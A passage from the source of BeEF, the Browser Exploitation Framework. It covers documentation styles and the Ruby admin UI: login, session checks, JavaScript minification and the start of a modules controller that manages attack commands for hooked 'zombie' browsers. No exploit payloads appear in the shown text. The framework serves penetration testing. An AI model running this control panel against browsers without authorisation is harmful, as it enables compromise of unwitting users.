!k){b=n;for(var o=void 0,c=b.firstChild;c;c=c.nextSibling)var i=c.nodeType,o=i===1?o?b:c:i===3?N.test(c.nodeValue)?b:o:o;b=(f=o===b?void 0:o)&&"CODE"===f.tagName}b&&(k=f.className.match(g));k&&(k=k[1]);b=!1;for(o=n.parentNode;o;o=o.parentNode)if((o.tagName==="pre"||o.tagName==="code"||o.tagName==="xmp")&&o.className&&o.className.indexOf("prettyprint")>=0){b=!0;break}b||((b=(b=n.className.match(/\blinenums\b(?::(\d+))?/))?b[1]&&b[1].length?+b[1]:!0:!1)&&D(n,b),d={g:k,h:n,i:b},E(d))}}p<h.length?setTimeout(m,
250):a&&a()}for(var e=[document.getElementsByTagName("pre"),document.getElementsByTagName("code"),document.getElementsByTagName("xmp")],h=[],k=0;k<e.length;++k)for(var t=0,s=e[k].length;t<s;++t)h.push(e[k][t]);var e=q,l=Date;l.now||(l={now:function(){return+new Date}});var p=0,d,g=/\blang(?:uage)?-([\w.]+)(?!\S)/;m()};window.PR={createSimpleLexer:x,registerLangHandler:k,sourceDecorator:u,PR_ATTRIB_NAME:"atn",PR_ATTRIB_VALUE:"atv",PR_COMMENT:"com",PR_DECLARATION:"dec",PR_KEYWORD:"kwd",PR_LITERAL:"lit",
PR_NOCODE:"nocode",PR_PLAIN:"pln",PR_PUNCTUATION:"pun",PR_SOURCE:"src",PR_STRING:"str",PR_TAG:"tag",PR_TYPE:"typ"}})(); |
beef/docs/styles/jsdoc-default.css | @font-face {
font-family: 'Open Sans';
font-weight: normal;
font-style: normal;
src: url('../fonts/OpenSans-Regular-webfont.eot');
src:
local('Open Sans'),
local('OpenSans'),
url('../fonts/OpenSans-Regular-webfont.eot?#iefix') format('embedded-opentype'),
url('../fonts/OpenSans-Regular-webfont.woff') format('woff'),
url('../fonts/OpenSans-Regular-webfont.svg#open_sansregular') format('svg');
}
@font-face {
font-family: 'Open Sans Light';
font-weight: normal;
font-style: normal;
src: url('../fonts/OpenSans-Light-webfont.eot');
src:
local('Open Sans Light'),
local('OpenSans Light'),
url('../fonts/OpenSans-Light-webfont.eot?#iefix') format('embedded-opentype'),
url('../fonts/OpenSans-Light-webfont.woff') format('woff'),
url('../fonts/OpenSans-Light-webfont.svg#open_sanslight') format('svg');
}
html
{
overflow: auto;
background-color: #fff;
font-size: 14px;
}
body
{
font-family: 'Open Sans', sans-serif;
line-height: 1.5;
color: #4d4e53;
background-color: white;
}
a, a:visited, a:active {
color: #0095dd;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
header
{
display: block;
padding: 0px 4px;
}
tt, code, kbd, samp {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
}
.class-description {
font-size: 130%;
line-height: 140%;
margin-bottom: 1em;
margin-top: 1em;
}
.class-description:empty {
margin: 0;
}
#main {
float: left;
width: 70%;
}
article dl {
margin-bottom: 40px;
}
article img {
max-width: 100%;
}
section
{
display: block;
background-color: #fff;
padding: 12px 24px;
border-bottom: 1px solid #ccc;
margin-right: 30px;
}
.variation {
display: none;
}
.signature-attributes {
font-size: 60%;
color: #aaa;
font-style: italic;
font-weight: lighter;
}
nav
{
display: block;
float: right;
margin-top: 28px;
width: 30%;
box-sizing: border-box;
border-left: 1px solid #ccc;
padding-left: 16px;
}
nav ul {
font-family: 'Lucida Grande', 'Lucida Sans Unicode', arial, sans-serif;
font-size: 100%;
line-height: 17px;
padding: 0;
margin: 0;
list-style-type: none;
}
nav ul a, nav ul a:visited, nav ul a:active {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
line-height: 18px;
color: #4D4E53;
}
nav h3 {
margin-top: 12px;
}
nav li {
margin-top: 6px;
}
footer {
display: block;
padding: 6px;
margin-top: 12px;
font-style: italic;
font-size: 90%;
}
h1, h2, h3, h4 {
font-weight: 200;
margin: 0;
}
h1
{
font-family: 'Open Sans Light', sans-serif;
font-size: 48px;
letter-spacing: -2px;
margin: 12px 24px 20px;
}
h2, h3.subsection-title
{
font-size: 30px;
font-weight: 700;
letter-spacing: -1px;
margin-bottom: 12px;
}
h3
{
font-size: 24px;
letter-spacing: -0.5px;
margin-bottom: 12px;
}
h4
{
font-size: 18px;
letter-spacing: -0.33px;
margin-bottom: 12px;
color: #4d4e53;
}
h5, .container-overview .subsection-title
{
font-size: 120%;
font-weight: bold;
letter-spacing: -0.01em;
margin: 8px 0 3px 0;
}
h6
{
font-size: 100%;
letter-spacing: -0.01em;
margin: 6px 0 3px 0;
font-style: italic;
}
table
{
border-spacing: 0;
border: 0;
border-collapse: collapse;
}
td, th
{
border: 1px solid #ddd;
margin: 0px;
text-align: left;
vertical-align: top;
padding: 4px 6px;
display: table-cell;
}
thead tr
{
background-color: #ddd;
font-weight: bold;
}
th { border-right: 1px solid #aaa; }
tr > th:last-child { border-right: 1px solid #ddd; }
.ancestors, .attribs { color: #999; }
.ancestors a, .attribs a
{
color: #999 !important;
text-decoration: none;
}
.clear
{
clear: both;
}
.important
{
font-weight: bold;
color: #950B02;
}
.yes-def {
text-indent: -1000px;
}
.type-signature {
color: #aaa;
}
.name, .signature {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
}
.details { margin-top: 14px; border-left: 2px solid #DDD; }
.details dt { width: 120px; float: left; padding-left: 10px; padding-top: 6px; }
.details dd { margin-left: 70px; }
.details ul { margin: 0; }
.details ul { list-style-type: none; }
.details li { margin-left: 30px; padding-top: 6px; }
.details pre.prettyprint { margin: 0 }
.details .object-value { padding-top: 0; }
.description {
margin-bottom: 1em;
margin-top: 1em;
}
.code-caption
{
font-style: italic;
font-size: 107%;
margin: 0;
}
.source
{
border: 1px solid #ddd;
width: 80%;
overflow: auto;
}
.prettyprint.source {
width: inherit;
}
.source code
{
font-size: 100%;
line-height: 18px;
display: block;
padding: 4px 12px;
margin: 0;
background-color: #fff;
color: #4D4E53;
}
.prettyprint code span.line
{
display: inline-block;
}
.prettyprint.linenums
{
padding-left: 70px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
.prettyprint.linenums ol
{
padding-left: 0;
}
.prettyprint.linenums li
{
border-left: 3px #ddd solid;
}
.prettyprint.linenums li.selected,
.prettyprint.linenums li.selected *
{
background-color: lightyellow;
}
.prettyprint.linenums li *
{
-webkit-user-select: text;
-moz-user-select: text;
-ms-user-select: text;
user-select: text;
}
.params .name, .props .name, .name code {
color: #4D4E53;
font-family: Consolas, Monaco, 'Andale Mono', monospace;
font-size: 100%;
}
.params td.description > p:first-child,
.props td.description > p:first-child
{
margin-top: 0;
padding-top: 0;
}
.params td.description > p:last-child,
.props td.description > p:last-child
{
margin-bottom: 0;
padding-bottom: 0;
}
.disabled {
color: #454545;
} |
|
beef/docs/styles/prettify-jsdoc.css | /* JSDoc prettify.js theme */
/* plain text */
.pln {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* string content */
.str {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a keyword */
.kwd {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a comment */
.com {
font-weight: normal;
font-style: italic;
}
/* a type name */
.typ {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* a literal value */
.lit {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* punctuation */
.pun {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* lisp open bracket */
.opn {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* lisp close bracket */
.clo {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a markup tag name */
.tag {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a markup attribute name */
.atn {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a markup attribute value */
.atv {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a declaration */
.dec {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a variable name */
.var {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* a function name */
.fun {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* Specify class=linenums on a pre to get line numbering */
ol.linenums {
margin-top: 0;
margin-bottom: 0;
} |
|
beef/docs/styles/prettify-tomorrow.css | /* Tomorrow Theme */
/* Original theme - https://github.com/chriskempson/tomorrow-theme */
/* Pretty printing styles. Used with prettify.js. */
/* SPAN elements with the classes below are added by prettyprint. */
/* plain text */
.pln {
color: #4d4d4c; }
@media screen {
/* string content */
.str {
color: #718c00; }
/* a keyword */
.kwd {
color: #8959a8; }
/* a comment */
.com {
color: #8e908c; }
/* a type name */
.typ {
color: #4271ae; }
/* a literal value */
.lit {
color: #f5871f; }
/* punctuation */
.pun {
color: #4d4d4c; }
/* lisp open bracket */
.opn {
color: #4d4d4c; }
/* lisp close bracket */
.clo {
color: #4d4d4c; }
/* a markup tag name */
.tag {
color: #c82829; }
/* a markup attribute name */
.atn {
color: #f5871f; }
/* a markup attribute value */
.atv {
color: #3e999f; }
/* a declaration */
.dec {
color: #f5871f; }
/* a variable name */
.var {
color: #c82829; }
/* a function name */
.fun {
color: #4271ae; } }
/* Use higher contrast and text-weight for printable form. */
@media print, projection {
.str {
color: #060; }
.kwd {
color: #006;
font-weight: bold; }
.com {
color: #600;
font-style: italic; }
.typ {
color: #404;
font-weight: bold; }
.lit {
color: #044; }
.pun, .opn, .clo {
color: #440; }
.tag {
color: #006;
font-weight: bold; }
.atn {
color: #404; }
.atv {
color: #060; } }
/* Style */
/*
pre.prettyprint {
background: white;
font-family: Consolas, Monaco, 'Andale Mono', monospace;
font-size: 12px;
line-height: 1.5;
border: 1px solid #ccc;
padding: 10px; }
*/
/* Specify class=linenums on a pre to get line numbering */
ol.linenums {
margin-top: 0;
margin-bottom: 0; }
/* IE indents via margin-left */
li.L0,
li.L1,
li.L2,
li.L3,
li.L4,
li.L5,
li.L6,
li.L7,
li.L8,
li.L9 {
/* */ }
/* Alternate shading for lines */
li.L1,
li.L3,
li.L5,
li.L7,
li.L9 {
/* */ } |
|
YAML | beef/extensions/admin_ui/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
extension:
admin_ui:
name: 'Admin UI'
enable: false
# Authentication and authorisation
session_cookie_name: "BEEFSESSION"
login_fail_delay: 1
# Admin UI
base_path: "/ui"
favicon_file_name: "favicon.ico"
play_sound_on_new_zombie: false
panel_update_interval: 10 # seconds |
Ruby | beef/extensions/admin_ui/extension.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
extend BeEF::API::Extension
@full_name = 'Administration Web UI'
@short_name = 'admin_ui'
@description = 'Command and control web interface'
end
end
end
# Constants
require 'extensions/admin_ui/constants/icons'
# Classes
require 'extensions/admin_ui/classes/httpcontroller'
require 'extensions/admin_ui/classes/session'
# Handlers
require 'extensions/admin_ui/handlers/ui'
# API Hooking
require 'extensions/admin_ui/api/handler' |
Ruby | beef/extensions/admin_ui/api/handler.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
module API
#
# We use this module to register all the http handler for the Administrator UI
#
module Handler
require 'uglifier'
BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
def self.evaluate_and_minify(content, params)
begin
erubis = Erubis::FastEruby.new(content)
evaluated = erubis.evaluate(params)
rescue => e
print_error("[Admin UI] Evaluating with Eruby failed: #{e.message}")
return
end
print_debug "[AdminUI] Minifying JavaScript (#{evaluated.size} bytes)"
opts = {
output: {
comments: :none
},
compress: {
dead_code: true
},
harmony: true
}
begin
minified = Uglifier.compile(evaluated, opts)
rescue StandardError => e
print_warning "[AdminUI] Error: Could not minify '#{name}' JavaScript file: #{e.message}"
print_more "[AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !"
return evaluated
end
print_debug "[AdminUI] Minified #{evaluated.size} bytes to #{minified.size} bytes"
return minified
end
def self.write_minified_js(name, content)
temp_file = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{File.basename(name)}", 'w+')
File.write(temp_file, content)
end
def self.build_javascript_ui
# NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w[
esapi/Class.create.js
esapi/jquery-3.3.1.min.js
esapi/jquery-encoder-0.1.0.js
]
ux = %w[
ui/common/beef_common.js
ux/PagingStore.js
ux/StatusBar.js
ux/TabCloseMenu.js
]
panel = %w[
ui/panel/common.js
ui/panel/PanelStatusBar.js
ui/panel/tabs/ZombieTabDetails.js
ui/panel/tabs/ZombieTabLogs.js
ui/panel/tabs/ZombieTabCommands.js
ui/panel/tabs/ZombieTabRider.js
ui/panel/tabs/ZombieTabXssRays.js
ui/panel/PanelViewer.js
ui/panel/LogsDataGrid.js
ui/panel/BrowserDetailsDataGrid.js
ui/panel/ZombieDataGrid.js
ui/panel/MainPanel.js
ui/panel/ZombieTab.js
ui/panel/ZombieTabs.js
ui/panel/zombiesTreeList.js
ui/panel/ZombiesMgr.js
ui/panel/tabs/ZombieTabNetwork.js
ui/panel/tabs/ZombieTabRTC.js
ui/panel/Logout.js
ui/panel/WelcomeTab.js
ui/panel/ModuleSearching.js
]
global_js = esapi + ux + panel
admin_ui_js = ''
global_js.each do |file_name|
admin_ui_js << ("#{File.binread("#{File.dirname(__FILE__)}/../media/javascript/#{file_name}")}\n\n")
end
config = BeEF::Core::Configuration.instance
bp = config.get 'beef.extension.admin_ui.base_path'
# if more dynamic variables are needed in JavaScript files
# add them here in the following Hash
params = {
'base_path' => bp
}
# process all JavaScript files, evaluating them with Erubis
print_debug '[AdminUI] Initializing admin panel ...'
web_ui_all = evaluate_and_minify(admin_ui_js, params)
unless web_ui_all
raise StandardError, "[AdminUI] evaluate_and_minify JavaScript failed: web_ui_all JavaScript is empty"
end
write_minified_js('web_ui_all.js', web_ui_all)
auth_js_file = "#{File.binread("#{File.dirname(__FILE__)}/../media/javascript/ui/authentication.js")}\n\n"
web_ui_auth = evaluate_and_minify(auth_js_file, params)
unless web_ui_auth
raise StandardError, "[AdminUI] evaluate_and_minify JavaScript failed: web_ui_auth JavaScript is empty"
end
write_minified_js('web_ui_auth.js', web_ui_auth)
rescue => e
raise StandardError, "Building Admin UI JavaScript failed: #{e.message}"
end
#
# This function gets called automatically by the server.
#
def self.mount_handler(beef_server)
config = BeEF::Core::Configuration.instance
# Web UI base path, like http://beef_domain/<bp>/panel
bp = config.get 'beef.extension.admin_ui.base_path'
# registers the http controllers used by BeEF core (authentication, logs, modules and panel)
Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].sort.each do |http_module|
require http_module
mod_name = File.basename http_module, '.rb'
beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
end
# mount the media folder where we store static files (javascript, css, images, audio) for the admin ui
media_dir = "#{File.dirname(__FILE__)}/../media/"
beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
# If we're not imitating a web server, mount the favicon to /favicon.ico
# NOTE: this appears to be broken
unless config.get('beef.http.web_server_imitation.enable')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(
"/extensions/admin_ui/media/images/#{config.get('beef.extension.admin_ui.favicon_file_name')}",
'/favicon.ico',
'ico'
)
end
build_javascript_ui
rescue => e
print_error("[Admin UI] Could not mount URL route handlers: #{e.message}")
print_more(e.backtrace)
exit(1)
end
end
end
end
end
end |
Ruby | beef/extensions/admin_ui/classes/httpcontroller.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
#
# Handle HTTP requests and call the relevant functions in the derived classes
#
class HttpController
attr_accessor :headers, :status, :body, :paths, :currentuser, :params
C = BeEF::Core::Models::Command
CM = BeEF::Core::Models::CommandModule
Z = BeEF::Core::Models::HookedBrowser
#
# Class constructor. Takes data from the child class and populates itself with it.
#
def initialize(data = {})
@erubis = nil
@status = 200 if data['status'].nil?
@session = BeEF::Extension::AdminUI::Session.instance
@config = BeEF::Core::Configuration.instance
@bp = @config.get 'beef.extension.admin_ui.base_path'
@headers = { 'Content-Type' => 'text/html; charset=UTF-8' } if data['headers'].nil?
@paths = if data['paths'].nil? && methods.include?('index')
{ 'index' => '/' }
else
data['paths']
end
end
#
# Authentication check. Confirm the request to access the UI comes from a permitted IP address
#
def authenticate_request(ip)
auth = BeEF::Extension::AdminUI::Controllers::Authentication.new
auth.permitted_source?(ip)
rescue StandardError => e
print_error "authenticate_request failed: #{e.message}"
false
end
#
# Check if reverse proxy has been enabled and return the correct client IP address
#
def get_ip(request)
if @config.get('beef.http.allow_reverse_proxy')
request.ip # Get client x-forwarded-for ip address
else
request.get_header('REMOTE_ADDR') # Get client remote ip address
end
end
#
# Handle HTTP requests and call the relevant functions in the derived classes
#
def run(request, response)
@request = request
@params = request.params
@body = ''
# If access to the UI is not permitted for the request IP address return a 404
unless authenticate_request(get_ip(@request))
@status = 404
return
end
# test if session is unauth'd and whether the auth functionality is requested
if [email protected]_session?(@request) && !instance_of?(BeEF::Extension::AdminUI::Controllers::Authentication)
@status = 302
@headers = { 'Location' => "#{@bp}/authentication" }
return
end
# get the mapped function (if it exists) from the derived class
path = request.path_info
unless BeEF::Filters.is_valid_path_info?(path)
print_error "[Admin UI] Path is not valid: #{path}"
return
end
function = @paths[path] || @paths[path + '/'] # check hash for '<path>' and '<path>/'
if function.nil?
print_error "[Admin UI] Path does not exist: #{path}"
return
end
# call the relevant mapped function
function.call
# build the template filename and apply it - if the file exists
function_name = function.name # used for filename
class_s = self.class.to_s.sub('BeEF::Extension::AdminUI::Controllers::', '').downcase # used for directory name
template_ui = "#{$root_dir}/extensions/admin_ui/controllers/#{class_s}/#{function_name}.html"
if File.exist?(template_ui)
@eruby = Erubis::FastEruby.new(File.read(template_ui))
@body = @eruby.result(binding) unless @eruby.nil? # apply template and set the response
end
# set appropriate content-type 'application/json' for .json files
@headers['Content-Type'] = 'application/json; charset=UTF-8' if request.path.to_s.end_with?('.json')
# set content type
if @headers['Content-Type'].nil?
@headers['Content-Type'] = 'text/html; charset=UTF-8' # default content and charset type for all pages
end
rescue StandardError => e
print_error "Error handling HTTP request: #{e.message}"
print_error e.backtrace
end
# Constructs a html script tag (from media/javascript directory)
def script_tag(filename)
"<script src=\"#{@bp}/media/javascript/#{filename}\" type=\"text/javascript\"></script>"
end
# Constructs a html script tag (from media/javascript-min directory)
def script_tag_min(filename)
"<script src=\"#{@bp}/media/javascript-min/#{filename}\" type=\"text/javascript\"></script>"
end
# Constructs a html stylesheet tag
def stylesheet_tag(filename)
"<link rel=\"stylesheet\" href=\"#{@bp}/media/css/#{filename}\" type=\"text/css\" />"
end
# Constructs a hidden html nonce tag
def nonce_tag
"<input type=\"hidden\" name=\"nonce\" id=\"nonce\" value=\"#{@session.get_nonce}\"/>"
end
def base_path
@bp.to_s
end
private
@eruby
# Unescapes a URL-encoded string.
def unescape(s)
s.tr('+', ' ').gsub(/%([\da-f]{2})/in) { [Regexp.last_match(1)].pack('H*') }
end
end
end
end
end |
Ruby | beef/extensions/admin_ui/classes/session.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
#
# The session for BeEF UI.
#
class Session
include Singleton
attr_reader :ip, :id, :nonce, :auth_timestamp
def initialize
set_logged_out
@auth_timestamp = Time.new
end
#
# set the session logged in
#
def set_logged_in(ip)
@id = BeEF::Core::Crypto.secure_token
@nonce = BeEF::Core::Crypto.secure_token
@ip = ip
end
#
# set the session logged out
#
def set_logged_out
@id = nil
@nonce = nil
@ip = nil
end
#
# set teh auth_timestamp
#
def set_auth_timestamp(time)
@auth_timestamp = time
end
#
# return the session id
#
def get_id
@id
end
#
# return the nonce
#
def get_nonce
@nonce
end
#
# return the auth_timestamp
#
def get_auth_timestamp
@auth_timestamp
end
#
# Check if nonce valid
#
def valid_nonce?(request)
# check if a valid session
return false unless valid_session?(request)
return false if @nonce.nil?
return false unless request.post?
# get nonce from request
request_nonce = request['nonce']
return false if request_nonce.nil?
# verify nonce
request_nonce.eql? @nonce
end
#
# Check if a session valid
#
def valid_session?(request)
# check if a valid session exists
return false if @id.nil?
return false if @ip.nil?
# check ip address matches
return false unless @ip.to_s.eql? request.ip
# get session cookie name from config
session_cookie_name = BeEF::Core::Configuration.instance.get('beef.extension.admin_ui.session_cookie_name')
# check session id matches
request.cookies.each do |cookie|
return true if (cookie[0].to_s.eql? session_cookie_name) and (cookie[1].eql? @id)
end
request
# not a valid session
false
end
end
end
end
end |
Ruby | beef/extensions/admin_ui/constants/icons.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
module Constants
module Icons
VERIFIED_NOT_WORKING_IMG = 'red.png'
VERIFIED_USER_NOTIFY_IMG = 'orange.png'
VERIFIED_WORKING_IMG = 'green.png'
VERIFIED_UNKNOWN_IMG = 'grey.png'
MODULE_TARGET_IMG_PATH = 'media/images/icons/'
end
end
end
end
end |
Ruby | beef/extensions/admin_ui/controllers/authentication/authentication.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
module Controllers
#
# The authentication web page for BeEF.
#
class Authentication < BeEF::Extension::AdminUI::HttpController
#
# Constructor
#
def initialize
super({
'paths' => {
'/' => method(:index),
'/login' => method(:login),
'/logout' => method(:logout)
}
})
@session = BeEF::Extension::AdminUI::Session.instance
end
# Function managing the index web page
def index
@headers['Content-Type'] = 'text/html; charset=UTF-8'
@headers['X-Frame-Options'] = 'sameorigin'
end
#
# Function managing the login
#
def login
username = @params['username-cfrm'] || ''
password = @params['password-cfrm'] || ''
@headers['Content-Type'] = 'application/json; charset=UTF-8'
@headers['X-Frame-Options'] = 'sameorigin'
@body = { success: false }.to_json
config = BeEF::Core::Configuration.instance
ua_ip = config.get('beef.http.allow_reverse_proxy') ? @request.ip : @request.get_header('REMOTE_ADDR')
# check if source IP address is permitted to authenticate
unless permitted_source?(ua_ip)
BeEF::Core::Logger.instance.register('Authentication', "IP source address (#{ua_ip}) attempted to authenticate but is not within permitted subnet.")
return
end
# check if under brute force attack
return unless BeEF::Core::Rest.timeout?('beef.extension.admin_ui.login_fail_delay',
@session.get_auth_timestamp,
->(time) { @session.set_auth_timestamp(time) })
# check username and password
unless username.eql?(config.get('beef.credentials.user')) && password.eql?(config.get('beef.credentials.passwd'))
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{ua_ip} has failed to authenticate in the application.")
return
end
# establish an authenticated session
@session.set_logged_in(ua_ip)
session_cookie_name = config.get('beef.extension.admin_ui.session_cookie_name') # get session cookie name
Rack::Utils.set_cookie_header!(@headers, session_cookie_name, { value: @session.get_id, path: '/', httponly: true })
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{ua_ip} has successfully authenticated in the application.")
@body = { success: true }.to_json
end
#
# Function managing the logout
#
def logout
@body = { success: true }.to_json
unless @session.valid_nonce?(@request)
print_error 'invalid nonce'
return
end
unless @session.valid_session?(@request)
print_error 'invalid session'
return
end
@headers['Content-Type'] = 'application/json; charset=UTF-8'
@headers['X-Frame-Options'] = 'sameorigin'
# set the session to be log out
@session.set_logged_out
# clean up UA and expire the session cookie
config = BeEF::Core::Configuration.instance
session_cookie_name = config.get('beef.extension.admin_ui.session_cookie_name') # get session cookie name
Rack::Utils.set_cookie_header!(@headers, session_cookie_name, { value: '', path: '/', httponly: true, expires: Time.now })
ua_ip = config.get('beef.http.allow_reverse_proxy') ? @request.ip : @request.get_header('REMOTE_ADDR')
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{ua_ip} has successfully logged out.")
end
#
# Check the UI browser source IP is within the permitted subnet
#
def permitted_source?(ip)
return false unless BeEF::Filters.is_valid_ip?(ip)
permitted_ui_subnet = BeEF::Core::Configuration.instance.get('beef.restrictions.permitted_ui_subnet')
return false if permitted_ui_subnet.nil?
return false if permitted_ui_subnet.empty?
permitted_ui_subnet.each do |subnet|
return true if IPAddr.new(subnet).include?(ip)
end
false
end
end
end
end
end
end |
HTML | beef/extensions/admin_ui/controllers/authentication/index.html | <!--
Copyright (c) 2006-2023 Wade Alcorn - [email protected]
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<html>
<head>
<title>BeEF Authentication</title>
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag_min 'web_ui_auth.js' %>
<%= stylesheet_tag 'ext-all.css' %>
<style>
#centered {
width:350px;
height:300px;
top:50%;
left:50%;
position:absolute;
margin-top:-250px;
margin-left:-175px;
}
#beef-logo {
margin:0 0 20px 75px;
}
</style>
</head>
<body>
<div id="centered"><img id="beef-logo" src="<%= base_path %>/media/images/beef.png" alt="BeEF - The Browser Exploitation Framework" /></div>
</body>
</html> |
Ruby | beef/extensions/admin_ui/controllers/modules/modules.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Extension
module AdminUI
module Controllers
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
'paths' => {
'/getRestfulApiToken.json' => method(:get_restful_api_token),
'/select/commandmodules/all.json' => method(:select_all_command_modules),
'/select/commandmodules/tree.json' => method(:select_command_modules_tree),
'/select/commandmodule.json' => method(:select_command_module),
'/select/command.json' => method(:select_command),
'/select/command_results.json' => method(:select_command_results),
'/commandmodule/commands.json' => method(:select_command_module_commands),
'/commandmodule/new' => method(:attach_command_module),
'/commandmodule/dynamicnew' => method(:attach_dynamic_command_module),
'/commandmodule/reexecute' => method(:reexecute_command_module)
}
})
@session = BeEF::Extension::AdminUI::Session.instance
end
# @note Returns the RESTful api key. Authenticated call, so callable only
# from the admin UI after successful authentication (cookie).
# -> http://127.0.0.1:3000/ui/modules/getRestfulApiToken.json
# response
# <- {"token":"800679edbb59976935d7673924caaa9e99f55c32"}
def get_restful_api_token
@body = {
'token' => BeEF::Core::Configuration.instance.get('beef.api_token')
}.to_json
end
# Returns the list of all command_modules in a JSON format
def select_all_command_modules
@body = command_modules2json(BeEF::Modules.get_enabled.keys)
end
# Set the correct icon for the command module
def set_command_module_icon(status)
path = BeEF::Extension::AdminUI::Constants::Icons::MODULE_TARGET_IMG_PATH # add icon path
path += case status
when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
BeEF::Extension::AdminUI::Constants::Icons::VERIFIED_NOT_WORKING_IMG
when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
BeEF::Extension::AdminUI::Constants::Icons::VERIFIED_USER_NOTIFY_IMG
when BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Extension::AdminUI::Constants::Icons::VERIFIED_WORKING_IMG
when BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN
BeEF::Extension::AdminUI::Constants::Icons::VERIFIED_UNKNOWN_IMG
else
BeEF::Extension::AdminUI::Constants::Icons::VERIFIED_UNKNOWN_IMG
end
# return path
path
end
# Set the correct working status for the command module
def set_command_module_status(mod)
hook_session_id = @params['zombie_session'] || nil
return BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN if hook_session_id.nil?
BeEF::Module.support(mod, {
'browser' => BD.get(hook_session_id, 'browser.name'),
'ver' => BD.get(hook_session_id, 'browser.version'),
'os' => [BD.get(hook_session_id, 'host.os.name')]
})
end
# If we're adding a leaf to the command tree, and it's in a subfolder, we need to recurse
# into the tree to find where it goes
def update_command_module_tree_recurse(tree, category, leaf)
working_category = category.shift
tree.each do |t|
if t['text'].eql? working_category && category.count > 0
# We have deeper to go
update_command_module_tree_recurse(t['children'], category, leaf)
elsif t['text'].eql? working_category
# Bingo
t['children'].push(leaf)
break
end
end
# return tree
end
# Add the command to the tree
def update_command_module_tree(tree, cmd_category, cmd_icon_path, cmd_status, cmd_name, cmd_id)
# construct leaf node for the command module tree
leaf_node = {
'text' => cmd_name,
'leaf' => true,
'icon' => cmd_icon_path,
'status' => cmd_status,
'id' => cmd_id
}
# add the node to the branch in the command module tree
if cmd_category.is_a?(Array)
# The category is an array, therefore it's a sub-folderised category
cat_copy = cmd_category.dup # Don't work with the original array, because, then it breaks shit
update_command_module_tree_recurse(tree, cat_copy, leaf_node)
else
# original logic here, simply add the command to the tree.
tree.each do |x|
if x['text'].eql? cmd_category
x['children'].push(leaf_node)
break
end
end
end
end
# Recursive function to build the tree now with sub-folders
def build_recursive_tree(parent, input)
cinput = input.shift.chomp('/')
if cinput.split('/').count == 1 # then we have a single folder now
if parent.detect { |p| p['text'] == cinput }.nil?
parent << { 'text' => cinput, 'cls' => 'folder', 'children' => [] }
elsif input.count > 0
parent.each do |p|
p['children'] = build_recursive_tree(p['children'], input) if p['text'] == cinput
end
end
else
# we have multiple folders
newinput = cinput.split('/')
newcinput = newinput.shift
parent << { 'text' => newcinput, 'cls' => 'folder', 'children' => [] } if parent.detect { |p| p['text'] == newcinput }.nil?
parent.each do |p|
p['children'] = build_recursive_tree(p['children'], newinput) if p['text'] == newcinput
end
end
if input.count > 0
build_recursive_tree(parent, input)
else
